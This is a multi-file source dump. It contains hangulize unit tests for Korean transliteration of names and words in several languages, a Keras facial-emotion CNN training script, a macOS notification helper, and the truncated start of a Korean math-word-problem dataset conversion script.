'padák': '파다크',
'lev': '레프',
'šplhati': '슈플하티',
'postel': '포스텔',
'most': '모스트',
'mrak': '므라크',
'podzim': '포드짐',
'noha': '노하',
'podmínka': '포드민카',
'němý': '네미',
'sáňky': '산키',
'Plzeň': '플젠',
'Praha': '프라하',
'koroptev': '코롭테프',
'strop': '스트로프',
'quasi': '크바시',
'ruka': '루카',
'harmonika': '하르모니카',
'mír': '미르',
'řeka': '르제카',
'námořník': '나모르주니크',
'hořký': '호르슈키',
'kouř': '코우르시',
'sedlo': '세들로',
'máslo': '마슬로',
'nos': '노스',
'šaty': '샤티',
'šternberk': '슈테른베르크',
'koš': '코시',
'tam': '탐',
'matka': '마트카',
'bolest': '볼레스트',
'tělo': '텔로',
'štěstí': '슈테스티',
"oběť": '오베티',
'vysoký': '비소키',
'knihovna': '크니호브나',
'kov': '코프',
'xerox': '제록스',
'saxofón': '삭소폰',
'zámek': '자메크',
'pozdní': '포즈드니',
'bez': '베스',
'žižka': '지슈카',
'žvěřina': '주베르지나',
'Brož': '브로시',
'jaro': '야로',
'pokoj': '포코이',
'balík': '발리크',
'komár': '코마르',
'dech': '데흐',
'léto': '레토',
'šest': '셰스트',
'věk': '베크',
'kino': '키노',
'míra': '미라',
'obec': '오베츠',
'nervózni': '네르보즈니',
'buben': '부벤',
'úrok': '우로크',
'dům': '둠',
'jazýk': '야지크',
'líný': '리니',
})
def test_1st(self):
"""제1항: k, p
어말과 유성 자음 앞에서는 '으'를 붙여 적고, 무성 자음 앞에서는
받침으로 적는다.
"""
self.assert_examples({
'mozek': '모제크',
'koroptev': '코롭테프',
})
def test_2nd(self):
"""제2항: b, d, d', g
1. 어말에 올 때에는 '프', '트', '티', '크'로 적는다.
2. 유성 자음 앞에서는 '브', '드', '디', '그'로 적는다.
3. 무성 자음 앞에서 b, g는 받침으로 적고, d, d'는 '트', '티'로 적는다.
"""
self.assert_examples({
'led': '레트',
'ledvina': '레드비나',
'obchod': '옵호트',
'odpadky': '오트파트키',
})
def test_3nd(self):
"""제3항: v, w, z, ř, ž, š
1. v, w, z가 무성 자음 앞이나 어말에 올 때에는 '프, 프, 스'로 적는다.
2. ř, ž가 유성 자음 앞에 올 때에는 '르주', '주', 무성 자음 앞에 올
때에는 '르슈', '슈', 어말에 올 때에는 '르시', '시'로 적는다.
3. š는 자음 앞에서는 '슈', 어말에서는 '시'로 적는다.
"""
self.assert_examples({
'hmyz': '흐미스',
'námořník': '나모르주니크',
'hořký': '호르슈키',
'kouř': '코우르시',
'puška': '푸슈카',
'myš': '미시',
})
def test_4th(self):
"""제4항: l, lj
어중의 l, lj가 모음 앞에 올 때에는 'ㄹㄹ', 'ㄹ리'로 적는다.
"""
self.assert_examples({
'kolo': '콜로',
})
def test_5th(self):
"""제5항: m
m이 r 앞에 올 때에는 '으'를 붙여 적는다.
"""
self.assert_examples({
'humr': '후므르',
})
def test_6th(self):
"""제6항
자음에 '예'가 결합되는 경우에는 '예' 대신에 '에'로 적는다. 다만,
자음이 'ㅅ'인 경우에는 '셰'로 적는다.
"""
self.assert_examples({
'věk': '베크',
'šest': '셰스트',
})
```
#### File: han/tests/cym.py
```python
from tests import HangulizeTestCase
from hangulize.langs.cym import Welsh
class WelshTestCase(HangulizeTestCase):
lang = Welsh()
def test_examples_of_iceager(self):
self.assert_examples({
'Cymru': '컴리',
'Cymraeg': '컴라이그',
'Caernarfon': '카이르나르본',
'Ceredigion': '케레디기온',
'Aberystwyth': '아베러스투이스',
'Brynmawr': '브런마우르',
'Llangollen': '흘란고흘렌',
'Llanelli': '흘라네흘리',
'Gwynedd': '귀네드',
'Ystradgynlais': '어스트라드건라이스',
'Tawe': '타웨',
'Powys': '포위스',
'Meredith': '메레디스',
'Glyndŵr': '글런두르',
'Rhys': '흐리스',
'Ifans': '이반스',
'Emrys': '엠리스',
'Hywel': '허웰',
'Gwilym': '귈림',
'Llinor': '흘리노르',
'Ieuan': '예이안',
'Cerys': '케리스',
'Dafydd': '다비드',
'Iwan': '이완',
'Huw': '히우',
'Ciaran': '키아란',
'Myfanwy': '머바누이',
'Llywelyn': '흘러웰린',
'Calennig': '칼레니그',
'cnapan': '크나판',
'cwm': '쿰',
'fy ngwely': '벙 웰리',
'fy nhadau': '번 하다이',
"Banc Ty'nddôl": '방크 턴돌',
})
```
#### File: han/tests/fin.py
```python
from tests import HangulizeTestCase
from hangulize.langs.fin import Finnish
class FinnishTestCase(HangulizeTestCase):
lang = Finnish()
def test_people(self):
self.assert_examples({
'<NAME>': '알바르 알토',
'Juhani Aho': '유하니 아호',
'Martti Ahtisaari': '마르티 아흐티사리',
'Akseli Gallen-Kallela': '악셀리 갈렌칼렐라',
'Veikko Hakulinen': '베이코 하쿨리넨',
'Pekka Halonen': '페카 할로넨',
'Tarja Halonen': '타리아 할로넨',
'Sami Hyypiä': '사미 휘피애',
'Mika Häkkinen': '미카 해키넨',
'Jussi Jääskeläinen': '유시 얘스켈래이넨',
'Aki Kaurismäki': '아키 카우리스매키',
'Urho Kekkonen': '우르호 케코넨',
'Miikka Kiprusoff': '미카 키프루소프',
'Marja-Liisa Kirvesniemi': '마리아리사 키르베스니에미',
'Mauno Koivisto': '마우노 코이비스토',
'Saku Koivu': '사쿠 코이부',
'Hannes Kolehmainen': '한네스 콜레흐마이넨',
'Jari Kurri': '야리 쿠리',
'Jari Litmanen': '야리 리트마넨',
'Eero Mäntyranta': '에로 맨튀란타',
'Paavo Nurmi': '파보 누르미',
'Ville Ritola': '빌레 리톨라',
'Kimi Räikkönen': '키미 래이쾨넨',
'Eero Saarinen': '에로 사리넨',
'Teemu Selanne': '테무 셀란네',
'Frans Eemil Sillanpää': '프란스 에밀 실란패',
'Tarja Turunen': '타리아 투루넨',
'Artturi Ilmari Virtanen': '아르투리 일마리 비르타넨',
'Yrjö Väisälä': '위리외 배이샐래',
'Tapio Wirkkala': '타피오 비르칼라',
})
def test_places(self):
self.assert_examples({
'Espoo': '에스포',
'Helsinki': '헬싱키',
'Joensuu': '요엔수',
'Jyväskylä': '위배스퀼래',
'Kajaani': '카야니',
'Karjala': '카리알라',
'Kuopio': '쿠오피오',
'Lappeenranta': '라펜란타',
'Mikkeli': '미켈리',
'Nokia': '노키아',
'Oulu': '오울루',
'Rovaniemi': '로바니에미',
'Saimaa': '사이마',
'Savonlinna': '사본린나',
'Suomenlinna': '수오멘린나',
'Suomi': '수오미',
'Tampere': '탐페레',
'Tapiola': '타피올라',
'Turku': '투르쿠',
'Vaasa': '바사',
'Vantaa': '반타',
})
def test_mythology(self):
self.assert_examples({
'Aino': '아이노',
'Ilmarinen': '일마리넨',
'Joukahainen': '요우카하이넨',
'Kalevala': '칼레발라',
'Kullervo': '쿨레르보',
'Lemminkäinen': '렘밍캐이넨',
'Louhi': '로우히',
'Marjatta': '마리아타',
'Pohjola': '포흐욜라',
'Sampo': '삼포',
'Ukko': '우코',
'Väinämöinen': '배이내뫼이넨',
})
def test_miscellaneous(self):
self.assert_examples({
'kantele': '칸텔레',
'sauna': '사우나',
'sisu': '시수',
})
```
#### File: han/tests/grc.py
```python
from tests import HangulizeTestCase
from hangulize.langs.grc import AncientGreek
class AncientGreekTestCase(HangulizeTestCase):
lang = AncientGreek()
def test_examples_of_iceager(self):
self.assert_examples({
'Αἴγυπτος': '아이깁토스',
'Ἀκρόπολις': '아크로폴리스',
'Ἀλεξάνδρεια': '알렉산드레이아',
'Ἁλικαρνασσός': '할리카르나소스',
'Ἀμφίπολις': '암피폴리스',
'Ἀντιόχεια': '안티오케이아',
'Ἄργος': '아르고스',
'Ἀτλάντις': '아틀란티스',
'Ἀττική': '아티케',
'Δαλματία': '달마티아',
'Δαμασκός': '다마스코스',
'Δαρδανέλλια': '다르다넬리아',
'Δεκάπολις': '데카폴리스',
'Δελφοί': '델포이',
'Δῆλος': '델로스',
'Ἐλεφαντίνη': '엘레판티네',
'Ἑλλάς': '헬라스',
'Ἑλλήσποντος': '헬레스폰토스',
'Εὔβοια': '에우보이아',
'Ζάκυνθος': '자킨토스',
'Θῆβαι': '테바이',
'Ἰθάκη': '이타케',
'Ἴλιον': '일리온',
'Ἱσπανία': '히스파니아',
'Ἰωνία': '이오니아',
'Ὄλυμπος': '올림포스',
'Ἑρμιόνη': '헤르미오네',
'Εὐρώπη': '에우로페',
'Ῥοδόπη': '로도페',
'Ῥόδος': '로도스',
'Σαλαμίς': '살라미스',
'Σαμοθρᾴκη': '사모트라케',
'Τῆλος': '텔로스',
'Τιτάν': '티탄',
'Τυῤῥηνία': '티레니아',
'Φρυγία': '프리기아',
'Ὠκεανία': '오케아니아',
'Ὦξος': '옥소스',
'Ὠρίων': '오리온',
'Εὐρυδίκη': '에우리디케',
'Ἀφροδίτη': '아프로디테',
'Ἀπόλλων': '아폴론',
'Ἄρης': '아레스',
'Ἀρτεμίς': '아르테미스',
'Ἀθηνᾶ': '아테나',
'Δημήτηρ': '데메테르',
'Ἥρα': '헤라',
'Ἀχελῷος': '아켈로오스',
'Ἀχέρων': '아케론',
'Ἄδωνις': '아도니스',
'Αἴολος': '아이올로스',
'Ἄτλας': '아틀라스',
'Βορέας': '보레아스',
'Χάος': '카오스',
'Χίμαιρα': '키마이라',
'Χρόνος': '크로노스',
'Δάφνη': '다프네',
'Διόνυσος': '디오니소스',
'Δωρίς': '도리스',
'Ἠώς': '에오스',
'Ἔρις': '에리스',
'Ἔρως': '에로스',
'Γαῖα': '가이아',
'Γανυμήδης': '가니메데스',
'ᾍδης': '하데스',
'Ἥβη': '헤베',
'Ἑκάτη': '헤카테',
'Ἑλένη': '헬레네',
'Ἥλιος': '헬리오스',
'Ἥφαιστος': '헤파이스토스',
'Ἡρακλῆς': '헤라클레스',
'Ἑρμής': '헤르메스',
'Ἑστία': '헤스티아',
'Ὕδρα': '히드라',
'Ὕπνος': '히프노스',
'Ίαπετός': '이아페토스',
'Ἶρις': '이리스',
'Καλλιόπη': '칼리오페',
'Κέρβερος': '케르베로스',
'Κυβέλη': '키벨레',
'Μέδουσα': '메두사',
'Μνήμη': '므네메',
'Μορφεύς': '모르페우스',
'Νέμεσις': '네메시스',
'Νηρεύς': '네레우스',
'Νίκη': '니케',
'Ὠρίων': '오리온',
'Πάν': '판',
'Πανδώρα': '판도라',
'Περσεφόνη': '페르세포네',
'Περσεύς': '페르세우스',
'Φοίβη': '포이베',
'Ποσειδῶν': '포세이돈',
'Προμηθεύς': '프로메테우스',
'Πρωτεύς': '프로테우스',
'Ῥέα': '레아',
'Σεμέλη': '세멜레',
'Σιληνός': '실레노스',
'Σφίγξ': '스핑크스',
'Στύξ': '스틱스',
'Θάνατος': '타나토스',
'Τυφών': '티폰',
'Οὐρανός': '우라노스',
'Ζέφυρος': '제피로스',
'Ζεύς': '제우스',
'Ὀρφεύς': '오르페우스',
'Σαπφώ': '사포',
'Πίνδαρος': '핀다로스',
'Ἱέρων': '히에론',
'Περικλῆς': '페리클레스',
'Ἡρόδοτος': '헤로도토스',
'Πλούταρχος': '플루타르코스',
'Ἀναξαγόρας': '아낙사고라스',
'Ἀρχιμήδης': '아르키메데스',
'Σωκράτης': '소크라테스',
'Πλάτων': '플라톤',
'Ἀριστοτέλης': '아리스토텔레스',
'Ἀλέξανδρος': '알렉산드로스',
'Ἀντιγόνη': '안티고네',
'Οἰδίπους': '오이디푸스',
'Βοιωτία': '보이오티아',
'Θουκυδίδης': '투키디데스',
'Ὅμηρος': '호메로스',
'Ἀριάδνη': '아리아드네',
'Ἰλιάς': '일리아스',
'Ὀδύσσεια': '오디세이아',
'Ἀχιλλεύς': '아킬레우스',
'Ἀγαμέμνων': '아가멤논',
'Μυκήνη': '미케네',
'Θερμοπύλαι': '테르모필라이',
'Λεωνίδας': '레오니다스',
'Ἀναξανδρίδας': '아낙산드리다스',
'Κλεομένης': '클레오메네스',
'Ὀδυσσεύς': '오디세우스',
'Πηνελόπη': '페넬로페',
'Σίσυφος': '시시포스',
'Νεμέα': '네메아',
'Ἰάσων': '이아손',
'Τυνδάρεως': '틴다레오스',
'Αἴας': '아이아스',
'Ἕκτωρ': '헥토르',
'Ἀνδρομάχη': '안드로마케',
'Τροία': '트로이아',
'Ἀντίγονος': '안티고노스',
'Σέλευκος': '셀레우코스',
'Πτολεμαῖος': '프톨레마이오스',
'Πέργαμον': '페르가몬',
'Ἄτταλος': '아탈로스',
'Κροῖσος': '크로이소스',
'Σόλων': '솔론',
'Λυκοῦργος': '리쿠르고스',
'Πολύβιος': '폴리비오스',
'Μίδας': '미다스',
'Κυβέλη': '키벨레',
'Σκύθαι': '스키타이',
'Ἀμαζόνες': '아마조네스',
'Ἀμαζών': '아마존',
'Πενθεσίλεια': '펜테실레이아',
'Ἱππολύτη': '히폴리테',
'Πυθία': '피티아',
'Πύθων': '피톤',
'όμφαλος': '옴팔로스',
'Πυθαγόρας': '피타고라스',
'Ἱπποκράτης': '히포크라테스',
'Πάππος': '파포스',
'Πυθαγόρας': '피타고라스',
'Ζήνων': '제논',
'Ἀναξίμανδρος': '아낙시만드로스',
'Θαλῆς': '탈레스',
'Δημόκριτος': '데모크리토스',
'Ἀπολλώνιος': '아폴로니오스',
'Στράβων': '스트라본',
'Εὐκτήμων': '에욱테몬',
'Ἐρατοσθένης': '에라토스테네스',
'Ἵππαρχος': '히파르코스',
'Ἡσίοδος': '헤시오도스',
'Αἴσωπος': '아이소포스',
'Εὐριπίδης': '에우리피데스',
'Ξενοφῶν': '크세노폰',
'Θεμιστοκλῆς': '테미스토클레스',
})
```
#### File: han/tests/lit.py
```python
from tests import HangulizeTestCase
from hangulize.langs.lit import Lithuanian
class LithuanianTestCase(HangulizeTestCase):
lang = Lithuanian()
def test_people(self):
self.assert_examples({
'<NAME>us': '발다스 아담쿠스',
'Virgilijus Alekna': '비르길리유스 알레크나',
'Algirdas': '알기르다스',
'Jurgis Baltrušaitis': '유르기스 발트루샤이티스',
'Gediminas Baravykas': '게디미나스 바라비카스',
'Jonas Basanavičius': '요나스 바사나비추스',
'Bernardas Brazdžionis': '베르나르다스 브라즈조니스',
'Elena Čiudakova': '엘레나 추다코바',
'Čiurlionis': '추를료니스',
'Tomas Danilevičius': '토마스 다닐레비추스',
'Simonas Daukantas': '시모나스 다우칸타스',
'Jurgis Dobkevičius': '유르기스 돕케비추스',
'Gediminas': '게디미나스',
'Vitas Gerulaitis': '비타스 게룰라이티스',
'Marija Gimbutienė': '마리야 김부티에네',
'Dalia Grybauskaitė': '달랴 그리바우스카이테',
'Laurynas Gucevičius': '라우리나스 구체비추스',
'Žydrūnas Ilgauskas': '지드루나스 일가우스카스',
'Jonas Jablonskis': '요나스 야블론스키스',
'Edgaras Jankauskas': '에드가라스 양카우스카스',
'Šarūnas Jasikevičius': '샤루나스 야시케비추스',
'Jogaila': '요가일라',
'Kęstutis': '케스투티스',
'Linas Kleiza': '리나스 클레이자',
'Konstantinas': '콘스탄티나스',
'Jonas Kubilius': '요나스 쿠빌류스',
'Vincas Kudirka': '빈차스 쿠디르카',
'Maironis': '마이로니스',
'Šarūnas Marčiulionis': '샤루나스 마르출료니스',
'Mikalojus': '미칼로유스',
'Mindaugas': '민다우가스',
'Arminas Narbekovas': '아르미나스 나르베코바스',
'Salomėja Nėris': '살로메야 네리스',
'Martynas Mažvydas': '마르티나스 마주비다스',
'Mykolas Kleopas Oginskis': '미콜라스 클레오파스 오긴스키스',
'Robertas Poškus': '로베르타스 포슈쿠스',
'Kazimiera Prunskienė': '카지미에라 프룬스키에네',
'Jonušas Radvila': '요누샤스 라드빌라',
'Violeta Riaubiškytė': '뵬레타 랴우비슈키테',
'Arvydas Sabonis': '아르비다스 사보니스',
'Antanas Smetona': '안타나스 스메토나',
'<NAME>aila': '다류스 송가일라',
'<NAME>kevičius': '마류스 스탕케비추스',
'Vytautas Straižys': '비타우타스 스트라이지스',
'Deividas Šemberas': '데이비다스 솀베라스',
'Ramūnas Šiškauskas': '라무나스 시슈카우스카스',
'Juozas Urbšys': '유오자스 우르프시스',
'Vytautas': '비타우타스',
})
def test_places(self):
self.assert_examples({
'Alytus': '알리투스',
'Biržai': '비르자이',
'Dubingiai': '두빙갸이',
'Įsrutis': '이스루티스',
'Kaunas': '카우나스',
'Kernavė': '케르나베',
'Klaipėda': '클라이페다',
'Marijampolė': '마리얌폴레',
'Mažeikiai': '마제이캬이',
'Panevėžys': '파네베지스',
'Šiauliai': '샤울랴이',
'Trakai': '트라카이',
'Vilnius': '빌뉴스',
})
```
#### File: han/tests/spa.py
```python
from tests import HangulizeTestCase
from hangulize.langs.spa import Spanish
class SpanishTestCase(HangulizeTestCase):
""" http://korean.go.kr/09_new/dic/rule/rule_foreign_0204.jsp """
lang = Spanish()
def test_basic(self):
""" http://korean.go.kr/09_new/dic/rule/rule_foreign_0102.jsp """
self.assert_examples({
'biz': '비스',
'blandon': '블란돈',
'braceo': '브라세오',
'colcren': '콜크렌',
'Cecilia': '세실리아',
'coccion': '콕시온',
'bistec': '비스텍',
'dictado': '딕타도',
'chicharra': '치차라',
'felicidad': '펠리시다드',
'fuga': '푸가',
'fran': '프란',
'ganga': '강가',
'geologia': '헤올로히아',
'yungla': '융글라',
'hipo': '이포',
'quehacer': '케아세르',
'jueves': '후에베스',
'reloj': '렐로',
'kapok': '카포크',
'lacrar': '라크라르',
'Lulio': '룰리오',
'ocal': '오칼',
'llama': '야마',
'lluvia': '유비아',
'membrete': '멤브레테',
'noche': '노체',
'flan': '플란',
'ñoñez': '뇨녜스',
'mañana': '마냐나',
'pepsina': '펩시나',
'plantón': '플란톤',
'quisquilla': '키스키야',
'rascador': '라스카도르',
'sastreria': '사스트레리아',
'tetraetro': '테트라에트로',
'viudedad': '비우데다드',
'xenón': '세논',
'laxante': '락산테',
'yuxta': '육스타',
'zagal': '사갈',
'liquidez': '리키데스',
'walkirias': '왈키리아스',
'yungla': '융글라',
'braceo': '브라세오',
'reloj': '렐로',
'Lulio': '룰리오',
'ocal': '오칼',
'viudedad': '비우데다드',
})
def test_1st(self):
"""제1항: gu, qu
gu, qu는 i, e 앞에서는 각각 'ㄱ, ㅋ'으로 적고, o 앞에서는 '구, 쿠'로
적는다. 다만, a 앞에서는 그 a와 합쳐 '과, 콰'로 적는다.
"""
self.assert_examples({
'guerra': '게라',
'queso': '케소',
'Guipuzcoa': '기푸스코아',
'quisquilla': '키스키야',
'antiguo': '안티구오',
'Quorem': '쿠오렘',
'Nicaragua': '니카라과',
'Quarai': '콰라이',
})
def test_2nd(self):
"""제2항
같은 자음이 겹치는 경우에는 겹치지 않은 경우와 같이 적는다. 다만,
-cc-는 'ㄱㅅ'으로 적는다.
"""
self.assert_examples({
'carrera': '카레라',
'carreterra': '카레테라',
'accion': '악시온',
})
def test_3rd(self):
"""제3항: c, g
c와 g 다음에 모음 e와 i가 올 때에는 c는 'ㅅ'으로, g는 'ㅎ'으로 적고,
그 외는 'ㅋ'과 'ㄱ'으로 적는다.
"""
self.assert_examples({
'Cecilia': '세실리아',
'cifra': '시프라',
'georgico': '헤오르히코',
'giganta': '히간타',
'coquito': '코키토',
'gato': '가토',
})
def test_4th(self):
"""제4항: x
x가 모음 앞에 오되 어두일 때에는 'ㅅ'으로 적고, 어중일 때에는
'ㄱㅅ'으로 적는다.
"""
self.assert_examples({
'xilofono': '실로포노',
'laxante': '락산테',
})
def test_5th(self):
"""제5항: l
어말 또는 자음 앞의 l은 받침 'ㄹ'로 적고, 어중의 1이 모음 앞에 올
때에는 'ㄹㄹ'로 적는다.
"""
self.assert_examples({
'ocal': '오칼',
'colcren': '콜크렌',
'blandon': '블란돈',
'Cecilia': '세실리아',
})
def test_6th(self):
"""제6항: nc, ng
c와 g 앞에 오는 n은 받침 'ㅇ'으로 적는다.
"""
self.assert_examples({
'blanco': '블랑코',
'yungla': '융글라',
})
def test_hangulize(self):
self.assert_examples({
'ñoñez': '뇨녜스',
'güerrero': '궤레로',
'Güicho': '귀초',
'Gamiño': '가미뇨',
'Ángeles': '앙헬레스',
'José Ortega y Gasset': '호세 오르테가 이 가세트',
})
```
#### File: han/tests/tur.py
```python
from tests import HangulizeTestCase
from hangulize.langs.tur import Turkish
class TurkishTestCase(HangulizeTestCase):
lang = Turkish()
def test_people(self):
self.assert_examples({
'<NAME>': '사이트 파이크 아바스야느크',
'Ali Kuşçu': '알리 쿠슈추',
'Hamit Altıntop': '하미트 알튼토프',
'<NAME>k': '무스타파 케말 아타튀르크',
'<NAME>': '가라베트 아미라 발리안',
'Krikor Balyan': '크리코르 발리안',
'Nigoğos Balyan': '니고오스 발리안',
'Battani': '바타니',
'Hüseyin Çağlayan': '휘세인 찰라얀',
'S<NAME>bi': '쉴레이만 첼레비',
'<NAME>ş': '라우프 뎅크타슈',
'Bülent Ecevit': '뷜렌트 에제비트',
'Ahmet Mithat Efendi': '아흐메트 미타트 에펜디',
'Yunus Emre': '유누스 엠레',
'Recep Tayyip Erdoğan': '레제프 타이이프 에르도안',
'Sertab Erener': '세르타브 에레네르',
'Tevfik Fikret': '테브피크 피크레트',
'Ertuğrul Gazi': '에르투룰 가지',
'Ziya Gökalp': '지야 괴칼프',
'Abdullah Gül': '아브둘라흐 귈',
'Şenol Güneş': '셰놀 귀네슈',
'Reşat Nuri Güntekin': '레샤트 누리 귄테킨',
'Ahmed Hâşim': '아흐메드 하심',
'Nâzım Hikmet': '나즘 히크메트',
'Nihat Kahveci': '니하트 카흐베지',
'Yakup Kadri Karaosmanoğlu': '야쿠프 카드리 카라오스마놀루',
'Nâmık Kemal': '나므크 케말',
'Yaşar Kemal': '야샤르 케말',
'Fazıl Küçük': '파즐 퀴취크',
'İlhan Mansız': '일한 만스즈',
'Nakkaş Osman': '나카슈 오스만',
'Orhan Pamuk': '오르한 파무크',
'Ajda Pekkan': '아주다 페칸',
'Osman Hamdi Bey': '오스만 함디 베이',
'Pir Sultan Abdal': '피르 술탄 아브달',
'Rüştü Reçber': '뤼슈튀 레치베르',
'Ziynet Sali': '지네트 살리',
'Ömer Seyfettin': '외메르 세이페틴',
'Kanuni Sultan Süleyman': '카누니 술탄 쉴레이만',
'Tuncay Şanlı': '툰자이 샨르',
'Âşık Veysel Şatıroğlu': '아시으크 베이셀 샤트롤루',
'Mahzuni Şerif': '마흐주니 셰리프',
'Hakan Şükür': '하칸 쉬퀴르',
'Takiyüddin ibn Manıf': '타키위딘 이븐 마느프',
'Tarkan Tevetoğlu': '타르칸 테베톨루',
'Arda Turan': '아르다 투란',
'Halit Ziya Uşaklıgil': '할리트 지야 우샤클르길',
})
def test_places(self):
self.assert_examples({
'Adana': '아다나',
'Ağrı': '아르',
'Ankara': '앙카라',
'Antakya': '안타키아',
'Antalya': '안탈리아',
'Arykanda': '아리칸다',
'Beşiktaş': '베식타슈',
'Bursa': '부르사',
'Çanakkale': '차나칼레',
'Çatalhöyük': '차탈회위크',
'Denizli': '데니즐리',
'Divriği': '디브리이',
'Dolmabahçe': '돌마바흐체',
'Gaziantep': '가지안테프',
'Hattuşaş': '하투샤슈',
'İstanbul': '이스탄불',
'İzmir': '이즈미르',
'Kapadokya': '카파도키아',
'Kayseri': '카이세리',
'Konya': '코니아',
'Mersin': '메르신',
'Pamukkale': '파무칼레',
'Patara': '파타라',
'Safranbolu': '사프란볼루',
'Selçuk': '셀추크',
'Topkapı': '톱카프',
'Trabzon': '트라브존',
'Türkiye': '튀르키예',
})
```
#### File: han/tests/vie.py
```python
from tests import HangulizeTestCase
from hangulize.langs.vie import Vietnamese
class VietnameseTestCase(HangulizeTestCase):
""" http://korean.go.kr/09_new/dic/rule/rule_foreign_0218.jsp """
lang = Vietnamese()
def test_1st(self):
"""제1항
nh는 이어지는 모음과 합쳐서 한 음절로 적는다. 어말이나 자음 앞에서는
받침 ‘ㄴ' 으로 적되, 그 앞의 모음이 a인 경우에는 a와 합쳐 ‘아인'으로
적는다.
"""
self.assert_examples({
# u'Nha Trang': u'냐짱',
# u'<NAME>': u'호찌민',
# u'Thanh Hoa': u'타인호아',
# u'Đông Khanh': u'동카인',
})
def test_2nd(self):
"""제2항
qu는 이어지는 모음이 a일 경우에는 합쳐서 ‘꽈'로 적는다.
"""
self.assert_examples({
'Quang': '꽝',
# u'hat quan ho': u'핫꽌호',
'Quôc': '꾸옥',
'Quyên': '꾸옌',
})
def test_3rd(self):
"""제3항
y는 뒤따르는 모음과 합쳐서 한 음절로 적는다.
"""
self.assert_examples({
'yên': '옌',
'Nguyên': '응우옌',
})
def test_4th(self):
"""제4항
어중의 l이 모음 앞에 올 때에는 ‘ㄹㄹ'로 적는다.
다만, 인명의 성과 이름은 별개의 단어로 보아 이 규칙을 적용하지 않는다.
"""
self.assert_examples({
# u'klông put': u'끌롱쁫',
'Pleiku': '쁠래이꾸',
# u'Ha Long': u'할롱',
# u'My Lay': u'밀라이',
})
``` |
{
"source": "jinwkim/emotion-detection",
"score": 3
} |
#### File: emotion-detection/face-emotion/face-emotion-model.py
```python
import keras
from keras.preprocessing import image
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Model, load_model
from keras.layers import Input, Dense, Dropout, Flatten, Conv2D, MaxPooling2D
import numpy as np
num_emotions = 7
batch_size = 256
steps_per_epoch = 112
epochs = 11
emotions = ['angry', 'disgust', 'fear', 'happy', 'sad', 'surprise', 'neutral']
def split_data():
# Import fer2013.csv
with open("fer2013.csv") as file:
data = file.readlines()
lines = np.array(data)
x_train, y_train, x_test, y_test = [], [], [], []
# Split dataset into training and test sets
for i in range(1,lines.size):
emotion, img, usage = lines[i].split(",")
val = img.split(" ")
pixels = np.array(val, 'float32')
emotion = keras.utils.np_utils.to_categorical(emotion, num_emotions)
if 'Training' in usage:
y_train.append(emotion)
x_train.append(pixels)
elif 'PublicTest' in usage:
y_test.append(emotion)
x_test.append(pixels)
# Cast and normalize data
x_train, y_train, x_test, y_test = np.array(x_train), np.array(y_train), np.array(x_test), np.array(y_test)
x_train, x_test = np.true_divide(x_train, 255.0), np.true_divide(x_test, 255.0)
# Make sure data is in the right shape
x_train, x_test = x_train.reshape( (len(x_train),48,48,1) ), x_test.reshape( (len(x_test),48,48,1) )
print("x_train, y_train, x_test, y_test: ",x_train.shape, y_train.shape, x_test.shape, y_test.shape)
return x_train, y_train, x_test, y_test
def create_model():
inputs = Input(shape=(48, 48, 1, ))
conv = Conv2D(filters=32, kernel_size=(3,3), activation='relu')(inputs)
conv = Conv2D(filters=64, kernel_size=(3,3), activation='relu')(conv)
pool = MaxPooling2D(pool_size=(2,2))(conv)
dropout = Dropout(0.4)(pool)
conv = Conv2D(filters=128, kernel_size=(3,3), activation='relu')(dropout)
pool = MaxPooling2D(pool_size=(2,2))(conv)
conv = Conv2D(filters=128, kernel_size=(3,3), activation='relu')(pool)
pool = MaxPooling2D(pool_size=(2,2))(conv)
dropout = Dropout(0.4)(pool)
flatten = Flatten()(dropout)
dense = Dense(1024, activation='relu')(flatten)
dropout = Dropout(0.5)(dense)
pred = Dense(7, activation='softmax')(dropout)
return Model(inputs=inputs, outputs=pred)
def cnn():
x_train, y_train, x_test, y_test = split_data()
model = create_model()
# Use ImageDataGenerator for better generalizability
datagen = ImageDataGenerator()
# Compile model
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])
# Train model, save for quick reload later
model.fit(datagen.flow(x_train, y_train, batch_size=batch_size), epochs=epochs, steps_per_epoch=steps_per_epoch,
validation_data=datagen.flow(x_test, y_test, batch_size=batch_size))
model.save('../models/face-emotion.h5')
def test_cnn():
model = load_model('../models/face-emotion.h5')
x_train, y_train, x_test, y_test = split_data()
print("evaluating facial emotion recognition model")
model.evaluate(x_test, y_test)
cnn()
test_cnn()
```
#### File: jinwkim/emotion-detection/notification.py
```python
import os
# https://code-maven.com/display-notification-from-the-mac-command-line
# Add audio feedback?
def displayNotification(message,title=None):
"""
Display an OSX notification with message title an subtitle
sounds are located in /System/Library/Sounds or ~/Library/Sounds
"""
title_part = ''
if title:
title_part = 'with title "{0}"'.format(title)
# icon_button = 'with icon caution buttons {\"OK\"}'
appleScriptNotification = 'display notification "{0}" {1} sound name "Beep"'.format(message,title_part)
os.system("osascript -e '{0}'".format(appleScriptNotification))
# speech = 'say "Please listen to the patient."'
# os.system("osascript -e '{0}'".format(speech))
# displayNotification(message="message", title="Your Patient Needs Your Attention")
``` |
{
"source": "Jinwon-DK/GaitAnalysis",
"score": 3
} |
#### File: GaitAnalysis/Code/utils.py
```python
import datetime
def dt_printer():
return datetime.datetime.now()
def dt_printer_m(modules):
data = list()
data.append(dt_printer())
for module in modules:
data.append(module())
return data
``` |
{
"source": "jinwonkim93/MWPToolkit",
"score": 3
} |
#### File: jinwonkim93/MWPToolkit/convert_problemsheet_to_testset_json.py
```python
import json
import argparse
from mwptoolkit.data.dataset.korean_dataset import transfer_digit_to_str
import pathlib
from pororo import Pororo
import re
DATA_PATH = '/home/agc2021/dataset/problemsheet.json'
EVAL_PATH ='./dataset/eval/'
# +
def ner_quantity(q, tk):
# tk = Pororo(task='ner', lang='ko')
cnt = 0
numbers = []
q_ = ''
for i in tk(q):
if i[1] == 'QUANTITY':
prior_end = 0
for p in re.finditer(r'((-?[0-9]+(?:,[0-9]{3})*(\.[0-9]+| ?/ ?-?[0-9]+)?)|(한|두|세|네|다섯|여섯|일곱|여덟|아홉|열) ?(개|칸|마리|권|번|자리|명|가지|사람)|(첫|둘|셋|넷) ?(번|째))', i[0]):
if p.group(2):
numbers.append(p.group(2))
q_ += i[0][prior_end:p.start()]
q_ += f' NUM_{cnt} '
cnt += 1
prior_end = p.end()
elif p.group(4):
numbers.append(p.group(4))
q_ += i[0][prior_end:p.start()]
q_ += f' NUM_{cnt} '
cnt += 1
q_ += p.group(5)
prior_end = p.end()
elif p.group(6):
numbers.append(p.group(6))
